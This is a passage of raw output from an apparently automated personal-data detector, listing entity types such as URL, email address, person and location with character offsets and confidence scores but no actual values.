0.5, type: URL, start: 1679, end: 1689, score: 0.5, type: URL, start: 1717, end: 1721, score: 0.5, type: URL, start: 1764, end: 1768, score: 0.5, type: URL, start: 1867, end: 1876, score: 0.5, type: URL, start: 1898, end: 1908, score: 0.5, type: URL, start: 1919, end: 1925, score: 0.5, type: URL, start: 1956, end: 1965, score: 0.5, type: URL, start: 2066, end: 2075, score: 0.5, type: URL, start: 2289, end: 2298, score: 0.5, type: URL, start: 2595, end: 2604, score: 0.5, type: URL, start: 2653, end: 2659, score: 0.5, type: URL, start: 2792, end: 2798, score: 0.5, type: URL, start: 2917, end: 2924, score: 0.5, type: URL, start: 3114, end: 3124, score: 0.5, type: URL, start: 3247, end: 3253, score: 0.5, type: URL, start: 3298, end: 3305, score: 0.5, type: URL, start: 3471, end: 3478, score: 0.5, type: URL, start: 3579, end: 3586, score: 0.5, type: URL, start: 3692, end: 3699, score: 0.5, type: URL, start: 4424, end: 4434, score: 0.5, type: URL, start: 5291, end: 5297, score: 0.5, type: URL, start: 6075, end: 6082, score: 0.5, type: URL, start: 6137, end: 6144, score: 0.5, type: URL, start: 6213, end: 6219, score: 0.5, type: URL, start: 6447, end: 6454, score: 0.5, type: URL, start: 6861, end: 6868, score: 0.5, type: URL, start: 7635, end: 7641, score: 0.5, type: URL, start: 7787, end: 7796, score: 0.5, type: URL, start: 7912, end: 7921, score: 0.5, type: URL, start: 8025, end: 8034, score: 0.5, type: URL, start: 8133, end: 8142, score: 0.5, type: URL, start: 8236, end: 8245, score: 0.5, type: URL, start: 8351, end: 8357, score: 0.5, type: URL, start: 8418, end: 8427, score: 0.5, type: URL, start: 8556, end: 8565, score: 0.5, type: URL, start: 8768, end: 8777, score: 0.5, type: URL, start: 8955, end: 8965, score: 0.5, type: URL, start: 9062, end: 9072, score: 0.5, type: URL, start: 9446, end: 9456, score: 0.5, type: URL, start: 9609, end: 9619, score: 0.5, type: URL, start: 9643, end: 9653, score: 0.5, type: URL, start: 9817, end: 9824, score: 0.5, type: EMAIL_ADDRESS, start: 67, end: 82, score: 1.0, type: EMAIL_ADDRESS, start: 108, end: 123, score: 1.0, type: EMAIL_ADDRESS, start: 150, end: 165, score: 1.0, type: EMAIL_ADDRESS, start: 194, end: 209, score: 1.0, type: PERSON, start: 48, end: 66, score: 0.85, type: PERSON, start: 93, end: 107, score: 0.85, type: LOCATION, start: 666, end: 675, score: 0.85, type: PERSON, start: 1208, end: 1223, score: 0.85, type: LOCATION, start: 1458, end: 1463, score: 0.85, type: LOCATION, start: 1913, end: 1918, score: 0.85, type: LOCATION, start: 2353, end: 2362, score: 0.85, type: LOCATION, start: 2428, end: 2437, score: 0.85, type: LOCATION, start: 2667, end: 2676, score: 0.85, type: PERSON, start: 3408, end: 3420, score: 0.85, type: LOCATION, start: 4095, end: 4104, score: 0.85, type: LOCATION, start: 4546, end: 4558, score: 0.85, type: PERSON, start: 4948, end: 4960, score: 0.85, type: PERSON, start: 5137, end: 5152, score: 0.85, type: NRP, start: 6197, end: 6206, score: 0.85, type: LOCATION, start: 6376, end: 6385, score: 0.85, type: LOCATION, start: 6432, end: 6441, score: 0.85, type: LOCATION, start: 6858, end: 6867, score: 0.85, type: LOCATION, start: 6914, end: 6923, score: 0.85, type: LOCATION, start: 7071, end: 7080, score: 0.85, type: LOCATION, start: 7082, end: 7094, score: 0.85, type: LOCATION, start: 7558, end: 7567, score: 0.85, type: LOCATION, start: 7616, end: 7625, score: 0.85, type: LOCATION, start: 7895, end: 7904, score: 0.85, type: PERSON, start: 8506, end: 8518, score: 0.85, type: LOCATION, start: 8617, end: 8626, score: 0.85, type: 
LOCATION, start: 8898, end: 8907, score: 0.85, type: LOCATION, start: 9703, end: 9712, score: 0.85, type: LOCATION, start: 9754, end: 9763, score: 0.85, type: LOCATION, start: 9911, end: 9920, score: 0.85, type: LOCATION, start: 9922, end: 9934, score: 0.85, type: LOCATION, start: 10352, end: 10361, score: 0.85, type: LOCATION, start: 10363, end: 10375, score: 0.85, type: LOCATION, start: 10405, end: 10414, score: 0.85, type: PERSON, start: 10456, end: 10468, score: 0.85, type: LOCATION, start: 10569, end: 10578, score: 0.85, type: LOCATION, start: 11327, end: 11336, score: 0.85, type: PERSON, start: 11542, end: 11554, score: 0.85, type: LOCATION, start: 12006, end: 12015, score: 0.85, type: LOCATION, start: 12935, end: 12940, score: 0.85, type: LOCATION, start: 14526, end: 14538, score: 0.85, type: DATE_TIME, start: 15609, end: 15613, score: 0.85, type: PERSON, start: 15715, end: 15732, score: 0.85, type: PERSON, start: 15734, end: 15750, score: 0.85, type: PERSON, start: 15755, end: 15766, score: 0.85, type: NRP, start: 16238, end: 16247, score: 0.85, type: LOCATION, start: 16529, end: 16538, score: 0.85, type: LOCATION, start: 16585, end: 16594, score: 0.85, type: LOCATION, start: 16956, end: 16965, score: 0.85, type: LOCATION, start: 17014, end: 17023, score: 0.85, type: LOCATION, start: 17164, end: 17173, score: 0.85, type: PERSON, start: 17357, end: 17364, score: 0.85, type: LOCATION, start: 17741, end: 17750, score: 0.85, type: PERSON, start: 17792, end: 17799, score: 0.85, type: LOCATION, start: 18055, end: 18071, score: 0.85, type: LOCATION, start: 18073, end: 18085, score: 0.85, type: LOCATION, start: 18655, end: 18664, score: 0.85, type: LOCATION, start: 18706, end: 18715, score: 0.85, type: LOCATION, start: 18863, end: 18872, score: 0.85, type: LOCATION, start: 18874, end: 18886, score: 0.85, type: LOCATION, start: 19282, end: 19291, score: 0.85, type: LOCATION, start: 19333, end: 19342, score: 0.85, type: LOCATION, start: 19490, end: 19499, score: 0.85, type: LOCATION, start: 19501, end: 19513, score: 0.85, type: LOCATION, start: 19873, end: 19882, score: 0.85, type: LOCATION, start: 19884, end: 19896, score: 0.85, type: LOCATION, start: 19926, end: 19935, score: 0.85, type: PERSON, start: 19977, end: 19989, score: 0.85, type: LOCATION, start: 20090, end: 20099, score: 0.85, type: IP_ADDRESS, start: 3457, end: 3471, score: 0.6, type: IP_ADDRESS, start: 12209, end: 12211, score: 0.6, type: URL, start: 73, end: 82, score: 0.5, type: URL, start: 114, end: 123, score: 0.5, type: URL, start: 156, end: 165, score: 0.5, type: URL, start: 200, end: 209, score: 0.5, type: URL, start: 365, end: 369, score: 0.5, type: URL, start: 1601, end: 1606, score: 0.5, type: URL, start: 1742, end: 1747, score: 0.5, type: URL, start: 1981, end: 1992, score: 0.5, type: URL, start: 2701, end: 2706, score: 0.5, type: URL, start: 3032, end: 3040, score: 0.5, type: URL, start: 5653, end: 5663, score: 0.5, type: URL, start: 5698, end: 5703, score: 0.5, type: URL, start: 5805, end: 5811, score: 0.5, type: URL, start: 6197, end: 6204, score: 0.5, type: URL, start: 7297, end: 7301, score: 0.5, type: URL, start: 7919, end: 7923, score: 0.5, type: URL, start: 7962, end: 7969, score: 0.5, type: URL, start: 8003, end: 8010, score: 0.5, type: URL, start: 8016, end: 8021, score: 0.5, type: URL, start: 8048, end: 8055, score: 0.5, type: URL, start: 8077, end: 8086, score: 0.5, type: URL, start: 8348, end: 8356, score: 0.5, type: URL, start: 8376, end: 8381, score: 0.5, type: URL, start: 8432, end: 8440, score: 0.5, 
type: URL, start: 9191, end: 9196, score: 0.5, type: URL, start: 9240, end: 9248, score: 0.5, type: URL, start: 9259, end: 9267, score: 0.5, type: URL, start: 9983, end: 9990, score: 0.5, type: URL, start: 10027, end: 10034, score: 0.5, type: URL, start: 10074, end: 10082, score: 0.5, type: URL, start: 10778, end: 10786, score: 0.5, type: URL, start: 10798, end: 10805, score: 0.5, type: URL, start: 11023, end: 11029, score: 0.5, type: URL, start: 11302, end: 11308, score: 0.5, type: URL, start: 11351, end: 11355, score: 0.5, type: URL, start: 11407, end: 11414, score: 0.5, type: URL, start: 11432, end: 11437, score: 0.5, type: URL, start: 11439, end: 11444, score: 0.5, type: URL, start: 11450, end: 11458, score: 0.5, type: URL, start: 11471, end: 11479, score: 0.5, type: URL, start: 11672, end: 11679, score: 0.5, type: URL, start: 11691, end: 11696, score: 0.5, type: URL, start: 11698, end: 11706, score: 0.5, type: URL, start: 11843, end: 11851, score: 0.5, type: URL, start: 12187, end: 12194, score: 0.5, type: URL, start: 12626, end: 12633, score: 0.5, type: URL, start: 12658, end: 12662, score: 0.5, type: URL, start: 12697, end: 12701, score: 0.5, type: URL, start: 12717, end: 12724, score: 0.5, type: URL, start: 12735, end: 12744, score: 0.5, type: URL, start: 12746, end: 12753, score: 0.5, type: URL, start: 12796, end: 12801, score: 0.5, type: URL, start: 12807, end: 12814, score: 0.5, type: URL, start: 12876, end: 12883, score: 0.5, type: URL, start: 14910, end: 14920, score: 0.5, type: URL, start: 14965, end: 14970, score: 0.5, type: URL, start: 15082, end: 15088, score: 0.5, type: URL, start: 16238, end: 16245, score: 0.5, type: URL, start: 16263, end: 16270, score: 0.5, type: URL, start: 16337, end: 16344, score: 0.5, type: URL, start: 17683, end: 17688, score: 0.5, type: URL, start: 17720, end: 17727, score: 0.5, type: URL, start: 17753, end: 17757, score: 0.5, type: URL, start: 17841, end: 17848, score: 0.5, type: URL, start: 17854, end: 17859, score: 0.5, type: URL, start: 17890, end: 17897, score: 0.5, type: URL, start: 17966, end: 17970, score: 0.5, type: URL, start: 18127, end: 18134, score: 0.5, type: URL, start: 18330, end: 18336, score: 0.5, type: URL, start: 18377, end: 18385, score: 0.5, type: URL, start: 18405, end: 18410, score: 0.5, type: URL, start: 18461, end: 18469, score: 0.5, type: URL, start: 18999, end: 19006, score: 0.5, type: URL, start: 19043, end: 19050, score: 0.5, type: URL, start: 19086, end: 19094, score: 0.5, type: URL, start: 19602, end: 19610, score: 0.5, type: URL, start: 20367, end: 20375, score: 0.5, type: URL, start: 20396, end: 20403, score: 0.5, type: URL, start: 20458, end: 20465, score: 0.5, type: EMAIL_ADDRESS, start: 1992, end: 2007, score: 1.0, type: EMAIL_ADDRESS, start: 2075, end: 2090, score: 1.0, type: EMAIL_ADDRESS, start: 2151, end: 2166, score: 1.0, type: EMAIL_ADDRESS, start: 2229, end: 2244, score: 1.0, type: EMAIL_ADDRESS, start: 7697, end: 7712, score: 1.0, type: LOCATION, start: 524, end: 536, score: 0.85, type: LOCATION, start: 817, end: 820, score: 0.85, type: LOCATION, start: 1252, end: 1266, score: 0.85, type: LOCATION, start: 1466, end: 1479, score: 0.85, type: LOCATION, start: 1768, end: 1773, score: 0.85, type: LOCATION, start: 1777, end: 1786, score: 0.85, type: LOCATION, start: 1790, end: 1796, score: 0.85, type: LOCATION, start: 1800, end: 1806, score: 0.85, type: LOCATION, start: 1810, end: 1816, score: 0.85, type: LOCATION, start: 1820, end: 1825, score: 0.85, type: LOCATION, start: 1829, end: 1835, score: 0.85, 
type: LOCATION, start: 1839, end: 1844, score: 0.85, type: LOCATION, start: 2332, end: 2344, score: 0.85, type: LOCATION, start: 3734, end: 3741, score: 0.85, type: LOCATION, start: 3754, end: 3758, score: 0.85, type: PERSON, start: 3771, end: 3775, score: 0.85, type: PERSON, start: 3821, end: 3839, score: 0.85, type: PERSON, start: 3864, end: 3868, score: 0.85, type: PERSON, start: 3875, end: 3881, score: 0.85, type: PERSON, start: 4143, end: 4146, score: 0.85, type: PERSON, start: 4451, end: 4455, score: 0.85, type: PERSON, start: 4459, end: 4462, score: 0.85, type: PERSON, start: 4466, end: 4471, score: 0.85, type: PERSON, start: 4475, end: 4479, score: 0.85, type: PERSON, start: 4483, end: 4487, score: 0.85, type: PERSON, start: 4500, end: 4506, score: 0.85, type: PERSON, start: 4520, end: 4524, score: 0.85, type: PERSON, start: 4538, end: 4545, score: 0.85, type: PERSON, start: 4563, end: 4568, score: 0.85, type: PERSON, start: 4572, end: 4578, score: 0.85, type: PERSON, start: 4621, end: 4628, score: 0.85, type: NRP, start: 4749, end: 4773, score: 0.85, type: DATE_TIME, start: 5226, end: 5231, score: 0.85, type: LOCATION, start: 7715, end: 7728, score: 0.85, type: LOCATION, start: 11135, end: 11143, score: 0.85, type: LOCATION, start: 13136, end: 13149, score: 0.85, type: NRP, start: 13251, end: 13281, score: 0.85, type: PERSON, start: 13499, end: 13511, score: 0.85, type: PERSON, start: 15136, end: 15148, score: 0.85, type: PERSON, start: 15568, end: 15574, score: 0.85, type: NRP, start: 17377, end: 17388, score: 0.85, type: PERSON, start: 18310, end: 18315, score: 0.85, type: LOCATION, start: 25640, end: 25650, score: 0.85, type: PERSON, start: 29783, end: 29789, score: 0.85, type: DATE_TIME, start: 29940, end: 29977, score: 0.85, type: URL, start: 9778, end: 9843, score: 0.6, type: URL, start: 252, end: 261, score: 0.5, type: URL, start: 285, end: 307, score: 0.5, type: URL, start: 329, end: 343, score: 0.5, type: URL, start: 390, end: 415, score: 0.5, type: URL, start: 624, end: 641, score: 0.5, type: URL, start: 666, end: 674, score: 0.5, type: URL, start: 720, end: 737, score: 0.5, type: URL, start: 854, end: 868, score: 0.5, type: URL, start: 1000, end: 1018, score: 0.5, type: URL, start: 1049, end: 1062, score: 0.5, type: URL, start: 1090, end: 1098, score: 0.5, type: URL, start: 1138, end: 1151, score: 0.5, type: URL, start: 1172, end: 1181, score: 0.5, type: URL, start: 1305, end: 1320, score: 0.5, type: URL, start: 1573, end: 1583, score: 0.5, type: URL, start: 1998, end: 2007, score: 0.5, type: URL, start: 2081, end: 2090, score: 0.5, type: URL, start: 2157, end: 2166, score: 0.5, type: URL, start: 2235, end: 2244, score: 0.5, type: URL, start: 5479, end: 5488, score: 0.5, type: URL, start: 5661, end: 5674, score: 0.5, type: URL, start: 5750, end: 5759, score: 0.5, type: URL, start: 5848, end: 5857, score: 0.5, type: URL, start: 5958, end: 5967, score: 0.5, type: URL, start: 6063, end: 6076, score: 0.5, type: URL, start: 6160, end: 6169, score: 0.5, type: URL, start: 6346, end: 6354, score: 0.5, type: URL, start: 6665, end: 6672, score: 0.5, type: URL, start: 6821, end: 6828, score: 0.5, type: URL, start: 7235, end: 7242, score: 0.5, type: URL, start: 7340, end: 7351, score: 0.5, type: URL, start: 7605, end: 7618, score: 0.5, type: URL, start: 7659, end: 7674, score: 0.5, type: URL, start: 7703, end: 7712, score: 0.5, type: URL, start: 7811, end: 7818, score: 0.5, type: URL, start: 7866, end: 7873, score: 0.5, type: URL, start: 7898, end: 7905, score: 0.5, type: URL, 
start: 7933, end: 7940, score: 0.5, type: URL, start: 7966, end: 7973, score: 0.5, type: URL, start: 7999, end: 8006, score: 0.5, type: URL, start: 8032, end: 8039, score: 0.5, type: URL, start: 8064, end: 8071, score: 0.5, type: URL, start: 8497, end: 8504, score: 0.5, type: URL, start: 8641, end: 8651, score: 0.5, type: URL, start: 8945, end: 8952, score: 0.5, type: URL, start: 8988, end: 8995, score: 0.5, type: URL, start: 9012, end: 9018, score: 0.5, type: URL, start: 9056, end: 9062, score: 0.5, type: URL, start: 9126, end: 9132, score: 0.5, type: URL, start: 9187, end: 9202, score: 0.5, type: URL, start: 9205, end: 9214, score: 0.5, type: URL, start: 9310, end: 9317, score: 0.5, type: URL, start: 9318, end: 9329, score: 0.5, type: URL, start: 9451, end: 9464, score: 0.5, type: URL, start: 9493, end: 9500, score: 0.5, type: URL, start: 9929, end: 9943, score: 0.5, type: URL, start: 10389, end: 10397, score: 0.5, type: URL, start: 11168, end: 11192, score: 0.5, type: URL, start: 11276, end: 11280, score: 0.5, type: URL, start: 11286, end: 11297, score: 0.5, type: URL, start: 11338, end: 11362, score: 0.5, type: URL, start: 11401, end: 11414, score: 0.5, type: URL, start: 11742, end: 11756, score: 0.5, type: URL, start: 11900, end: 11914, score: 0.5, type: URL, start: 11919, end: 11926, score: 0.5, type: URL, start: 11975, end: 11986, score: 0.5, type: URL, start: 12215, end: 12228, score: 0.5, type: URL, start: 12321, end: 12327, score: 0.5, type: URL, start: 12482, end: 12488, score: 0.5, type: URL, start: 12619, end: 12623, score: 0.5, type: URL, start: 12644, end: 12659, score: 0.5, type: URL, start: 12664, end: 12673, score: 0.5, type: URL, start: 12722, end: 12735, score: 0.5, type: URL, start: 13066, end: 13081, score: 0.5, type: URL, start: 13107, end: 13113, score: 0.5, type: URL, start: 13128, end: 13134, score: 0.5, type: URL, start: 13217, end: 13224, score: 0.5, type: URL, start: 13251, end: 13257, score: 0.5, type: URL, start: 13302, end: 13315, score: 0.5, type: URL, start: 13560, end: 13566, score: 0.5, type: URL, start: 13629, end: 13647, score: 0.5, type: URL, start: 13886, end: 13899, score: 0.5, type: URL, start: 14144, end: 14150, score: 0.5, type: URL, start: 14219, end: 14242, score: 0.5, type: URL, start: 14491, end: 14497, score: 0.5, type: URL, start: 14548, end: 14561, score: 0.5, type: URL, start: 14806, end: 14812, score: 0.5, type: URL, start: 14916, end: 14931, score: 0.5, type: URL, start: 15028, end: 15043, score: 0.5, type: URL, start: 15046, end: 15055, score: 0.5, type: URL, start: 15136, end: 15144, score: 0.5, type: URL, start: 15179, end: 15187, score: 0.5, type: URL, start: 15211, end: 15217, score: 0.5, type: URL, start: 15264, end: 15277, score: 0.5, type: URL, start: 15522, end: 15528, score: 0.5, type: URL, start: 15592, end: 15600, score: 0.5, type: URL, start: 15604, end: 15614, score: 0.5, type: URL, start: 15693, end: 15706, score: 0.5, type: URL, start: 15939, end: 15945, score: 0.5, type: URL, start: 16087, end: 16093, score: 0.5, type: URL, start: 16149, end: 16162, score: 0.5, type: URL, start: 16659, end: 16665, score: 0.5, type: URL, start: 16716, end: 16726, score: 0.5, type: URL, start: 16760, end: 16766, score: 0.5, type: URL, start: 16822, end: 16835, score: 0.5, type: URL, start: 17143, end: 17167, score: 0.5, type: URL, start: 17403, end: 17409, score: 0.5, type: URL, start: 17435, end: 17442, score: 0.5, type: URL, start: 17793, end: 17801, score: 0.5, type: URL, start: 18015, end: 18021, score: 0.5, type: URL, start: 18170, 
end: 18178, score: 0.5, type: URL, start: 18265, end: 18272, score: 0.5, type: URL, start: 18330, end: 18338, score: 0.5, type: URL, start: 18452, end: 18460, score: 0.5, type: URL, start: 18566, end: 18574, score: 0.5, type: URL, start: 18674, end: 18682, score: 0.5, type: URL, start: 19041, end: 19049, score: 0.5, type: URL, start: 19122, end: 19130, score: 0.5, type: URL, start: 19202, end: 19210, score: 0.5, type: URL, start: 19641, end: 19647, score: 0.5, type: URL, start: 19783, end: 19789, score: 0.5, type: URL, start: 19929, end: 19935, score: 0.5, type: URL, start: 20092, end: 20098, score: 0.5, type: URL, start: 20140, end: 20144, score: 0.5, type: URL, start: 20164, end: 20168, score: 0.5, type: URL, start: 20179, end: 20187, score: 0.5, type: URL, start: 20196, end: 20200, score: 0.5, type: URL, start: 20575, end: 20582, score: 0.5, type: URL, start: 20729, end: 20738, score: 0.5, type: URL, start: 20846, end: 20854, score: 0.5, type: URL, start: 22017, end: 22023, score: 0.5, type: URL, start: 22253, end: 22259, score: 0.5, type: URL, start: 22400, end: 22406, score: 0.5, type: URL, start: 22611, end: 22617, score: 0.5, type: URL, start: 22848, end: 22854, score: 0.5, type: URL, start: 23105, end: 23111, score: 0.5, type: URL, start: 23348, end: 23354, score: 0.5, type: URL, start: 23600, end: 23606, score: 0.5, type: URL, start: 23805, end: 23829, score: 0.5, type: URL, start: 24018, end: 24042, score: 0.5, type: URL, start: 24288, end: 24302, score: 0.5, type: URL, start: 24439, end: 24445, score: 0.5, type: URL, start: 24490, end: 24497, score: 0.5, type: URL, start: 24542, end: 24556, score: 0.5, type: URL, start: 24636, end: 24644, score: 0.5, type: URL, start: 24683, end: 24690, score: 0.5, type: URL, start: 24771, end: 24778, score: 0.5, type: URL, start: 25185, end: 25191, score: 0.5, type: URL, start: 25223, end: 25229, score: 0.5, type: URL, start: 25279, end: 25285, score: 0.5, type: URL, start: 25311, end: 25319, score: 0.5, type: URL, start: 25427, end: 25433, score: 0.5, type: URL, start: 25484, end: 25501, score: 0.5, type: URL, start: 25629, end: 25636, score: 0.5, type: URL, start: 25640, end: 25648, score: 0.5, type: URL, start: 25675, end: 25681, score: 0.5, type: URL, start: 25707, end: 25719, score: 0.5, type: URL, start: 25791, end: 25799, score: 0.5, type: URL, start: 25899, end: 25905, score: 0.5, type: URL, start: 25968, end: 25986, score: 0.5, type: URL, start: 26010, end: 26016, score: 0.5, type: URL, start: 26066, end: 26076, score: 0.5, type: URL, start: 26154, end: 26161, score: 0.5, type: URL, start: 26165, end: 26175, score: 0.5, type: URL, start: 26177, end: 26183, score: 0.5, type: URL, start: 26201, end: 26208, score: 0.5, type: URL, start: 26263, end: 26269, score: 0.5, type: URL, start: 26466, end: 26472, score: 0.5, type: URL, start: 26502, end: 26508, score: 0.5, type: URL, start: 26522, end: 26528, score: 0.5, type: URL, start: 26567, end: 26585, score: 0.5, type: URL, start: 26730, end: 26736, score: 0.5, type: URL, start: 26968, end: 26986, score: 0.5, type: URL, start: 27021, end: 27036, score: 0.5, type: URL, start: 27146, end: 27153, score: 0.5, type: URL, start: 27157, end: 27168, score: 0.5, type: URL, start: 27218, end: 27225, score: 0.5, type: URL, start: 27307, end: 27318, score: 0.5, type: URL, start: 27357, end: 27363, score: 0.5, type: URL, start: 27608, end: 27616, score: 0.5, type: URL, start: 27682, end: 27688, score: 0.5, type: URL, start: 27801, end: 27807, score: 0.5, type: URL, start: 27850, end: 27856, score: 0.5, 
type: URL, start: 27879, end: 27885, score: 0.5, type: URL, start: 27967, end: 27985, score: 0.5, type: URL, start: 28071, end: 28077, score: 0.5, type: URL, start: 28112, end: 28127, score: 0.5, type: URL, start: 28250, end: 28256, score: 0.5, type: URL, start: 29057, end: 29065, score: 0.5, type: URL, start: 29160, end: 29171, score: 0.5, type: URL, start: 29766, end: 29772, score: 0.5, type: URL, start: 29912, end: 29923, score: 0.5, type: URL, start: 29931, end: 29942, score: 0.5, type: URL, start: 30013, end: 30020, score: 0.5, type: URL, start: 30056, end: 30063, score: 0.5, type: URL, start: 30345, end: 30358, score: 0.5, type: URL, start: 30557, end: 30570, score: 0.5, type: LOCATION, start: 229, end: 237, score: 0.85, type: LOCATION, start: 889, end: 904, score: 0.85, type: LOCATION, start: 1499, end: 1514, score: 0.85, type: LOCATION, start: 2736, end: 2751, score: 0.85, type: NRP, start: 2767, end: 2788, score: 0.85, type: LOCATION, start: 4100, end: 4115, score: 0.85, type: NRP, start: 4131, end: 4152, score: 0.85, type: URL, start: 6366, end: 6381, score: 0.85, type: URL, start: 6987, end: 7002, score: 0.85, type: URL, start: 31, end: 38, score: 0.5, type: URL, start: 63, end: 77, score: 0.5, type: URL, start: 109, end: 123, score: 0.5, type: URL, start: 151, end: 159, score: 0.5, type: URL, start: 335, end: 343, score: 0.5, type: URL, start: 401, end: 416, score: 0.5, type: URL, start: 483, end: 494, score: 0.5, type: URL, start: 522, end: 527, score: 0.5, type: URL, start: 547, end: 566, score: 0.5, type: URL, start: 607, end: 612, score: 0.5, type: URL, start: 634, end: 653, score: 0.5, type: URL, start: 744, end: 755, score: 0.5, type: URL, start: 797, end: 802, score: 0.5, type: URL, start: 824, end: 843, score: 0.5, type: URL, start: 1016, end: 1031, score: 0.5, type: URL, start: 1092, end: 1103, score: 0.5, type: URL, start: 1131, end: 1136, score: 0.5, type: URL, start: 1156, end: 1175, score: 0.5, type: URL, start: 1216, end: 1221, score: 0.5, type: URL, start: 1243, end: 1262, score: 0.5, type: URL, start: 1354, end: 1365, score: 0.5, type: URL, start: 1407, end: 1412, score: 0.5, type: URL, start: 1434, end: 1453, score: 0.5, type: URL, start: 1591, end: 1607, score: 0.5, type: URL, start: 1667, end: 1678, score: 0.5, type: URL, start: 1720, end: 1725, score: 0.5, type: URL, start: 1747, end: 1766, score: 0.5, type: URL, start: 1883, end: 1898, score: 0.5, type: URL, start: 1966, end: 1977, score: 0.5, type: URL, start: 2005, end: 2010, score: 0.5, type: URL, start: 2030, end: 2049, score: 0.5, type: URL, start: 2090, end: 2095, score: 0.5, type: URL, start: 2117, end: 2136, score: 0.5, type: URL, start: 2183, end: 2202, score: 0.5, type: URL, start: 2241, end: 2246, score: 0.5, type: URL, start: 2274, end: 2293, score: 0.5, type: URL, start: 2363, end: 2374, score: 0.5, type: URL, start: 2402, end: 2407, score: 0.5, type: URL, start: 2427, end: 2446, score: 0.5, type: URL, start: 2487, end: 2492, score: 0.5, type: URL, start: 2514, end: 2533, score: 0.5, type: URL, start: 2575, end: 2580, score: 0.5, type: URL, start: 2608, end: 2627, score: 0.5, type: URL, start: 2674, end: 2693, score: 0.5, type: URL, start: 2966, end: 2976, score: 0.5, type: URL, start: 3037, end: 3048, score: 0.5, type: URL, start: 3076, end: 3081, score: 0.5, type: URL, start: 3101, end: 3120, score: 0.5, type: URL, start: 3169, end: 3188, score: 0.5, type: URL, start: 3254, end: 3269, score: 0.5, type: URL, start: 3330, end: 3341, score: 0.5, type: URL, start: 3369, end: 3374, score: 0.5, 
type: URL, start: 3394, end: 3413, score: 0.5, type: URL, start: 3454, end: 3459, score: 0.5, type: URL, start: 3481, end: 3500, score: 0.5, type: URL, start: 3547, end: 3566, score: 0.5, type: URL, start: 3605, end: 3610, score: 0.5, type: URL, start: 3638, end: 3657, score: 0.5, type: URL, start: 3727, end: 3738, score: 0.5, type: URL, start: 3766, end: 3771, score: 0.5, type: URL, start: 3791, end: 3810, score: 0.5, type: URL, start: 3851, end: 3856, score: 0.5, type: URL, start: 3878, end: 3897, score: 0.5, type: URL, start: 3939, end: 3944, score: 0.5, type: URL, start: 3972, end: 3991, score: 0.5, type: URL, start: 4038, end: 4057, score: 0.5, type: URL, start: 4276, end: 4291, score: 0.5, type: URL, start: 4367, end: 4378, score: 0.5, type: URL, start: 4406, end: 4411, score: 0.5, type: URL, start: 4431, end: 4450, score: 0.5, type: URL, start: 4491, end: 4496, score: 0.5, type: URL, start: 4518, end: 4537, score: 0.5, type: URL, start: 4573, end: 4588, score: 0.5, type: URL, start: 4664, end: 4675, score: 0.5, type: URL, start: 4703, end: 4708, score: 0.5, type: URL, start: 4728, end: 4747, score: 0.5, type: URL, start: 4788, end: 4793, score: 0.5, type: URL, start: 4815, end: 4834, score: 0.5, type: URL, start: 4918, end: 4933, score: 0.5, type: URL, start: 5026, end: 5037, score: 0.5, type: URL, start: 5065, end: 5070, score: 0.5, type: URL, start: 5090, end: 5109, score: 0.5, type: URL, start: 5150, end: 5155, score: 0.5, type: URL, start: 5177, end: 5196, score: 0.5, type: URL, start: 5314, end: 5329, score: 0.5, type: URL, start: 5408, end: 5419, score: 0.5, type: URL, start: 5447, end: 5452, score: 0.5, type: URL, start: 5472, end: 5491, score: 0.5, type: URL, start: 5532, end: 5537, score: 0.5, type: URL, start: 5559, end: 5578, score: 0.5, type: URL, start: 5614, end: 5629, score: 0.5, type: URL, start: 5708, end: 5719, score: 0.5, type: URL, start: 5747, end: 5752, score: 0.5, type: URL, start: 5772, end: 5791, score: 0.5, type: URL, start: 5832, end: 5837, score: 0.5, type: URL, start: 5859, end: 5878, score: 0.5, type: URL, start: 5962, end: 5977, score: 0.5, type: URL, start: 6070, end: 6081, score: 0.5, type: URL, start: 6109, end: 6114, score: 0.5, type: URL, start: 6134, end: 6153, score: 0.5, type: URL, start: 6194, end: 6199, score: 0.5, type: URL, start: 6221, end: 6240, score: 0.5, type: URL, start: 6448, end: 6459, score: 0.5, type: URL, start: 6736, end: 6747, score: 0.5, type: URL, start: 7505, end: 7516, score: 0.5, type: URL, start: 7794, end: 7805, score: 0.5, type: EMAIL_ADDRESS, start: 168, end: 183, score: 1.0, type: DATE_TIME, start: 146, end: 150, score: 0.85, type: PERSON, start: 151, end: 167, score: 0.85, type: LOCATION, start: 2742, end: 2747, score: 0.85, type: PERSON, start: 5569, end: 5573, score: 0.85, type: PERSON, start: 5575, end: 5580, score: 0.85, type: URL, start: 807, end: 835, score: 0.6, type: URL, start: 174, end: 183, score: 0.5, type: URL, start: 890, end: 901, score: 0.5, type: URL, start: 927, end: 947, score: 0.5, type: URL, start: 983, end: 993, score: 0.5, type: URL, start: 1257, end: 1264, score: 0.5, type: URL, start: 1325, end: 1332, score: 0.5, type: URL, start: 1373, end: 1380, score: 0.5, type: URL, start: 1512, end: 1519, score: 0.5, type: URL, start: 1624, end: 1631, score: 0.5, type: URL, start: 1737, end: 1744, score: 0.5, type: URL, start: 1782, end: 1789, score: 0.5, type: URL, start: 1884, end: 1891, score: 0.5, type: URL, start: 2187, end: 2194, score: 0.5, type: URL, start: 2208, end: 2217, score: 0.5, type: URL, 
start: 2456, end: 2471, score: 0.5, type: URL, start: 2662, end: 2669, score: 0.5, type: URL, start: 2680, end: 2689, score: 0.5, type: URL, start: 2711, end: 2721, score: 0.5, type: URL, start: 2866, end: 2881, score: 0.5, type: URL, start: 2896, end: 2903, score: 0.5, type: URL, start: 3111, end: 3121, score: 0.5, type: URL, start: 3311, end: 3318, score: 0.5, type: URL, start: 3343, end: 3350, score: 0.5, type: URL, start: 3376, end: 3387, score: 0.5, type: URL, start: 3411, end: 3418, score: 0.5, type: URL, start: 3453, end: 3463, score: 0.5, type: URL, start: 3718, end: 3725, score: 0.5, type: URL, start: 3767, end: 3774, score: 0.5, type: URL, start: 3796, end: 3803, score: 0.5, type: URL, start: 3829, end: 3836, score: 0.5, type: URL, start: 3862, end: 3873, score: 0.5, type: URL, start: 3908, end: 3915, score: 0.5, type: URL, start: 3937, end: 3944, score: 0.5, type: URL, start: 4015, end: 4022, score: 0.5, type: URL, start: 4346, end: 4353, score: 0.5, type: URL, start: 4364, end: 4373, score: 0.5, type: URL, start: 4388, end: 4398, score: 0.5, type: URL, start: 4421, end: 4431, score: 0.5, type: URL, start: 4475, end: 4485, score: 0.5, type: URL, start: 4497, end: 4504, score: 0.5, type: URL, start: 4616, end: 4623, score: 0.5, type: URL, start: 4643, end: 4653, score: 0.5, type: URL, start: 4665, end: 4672, score: 0.5, type: URL, start: 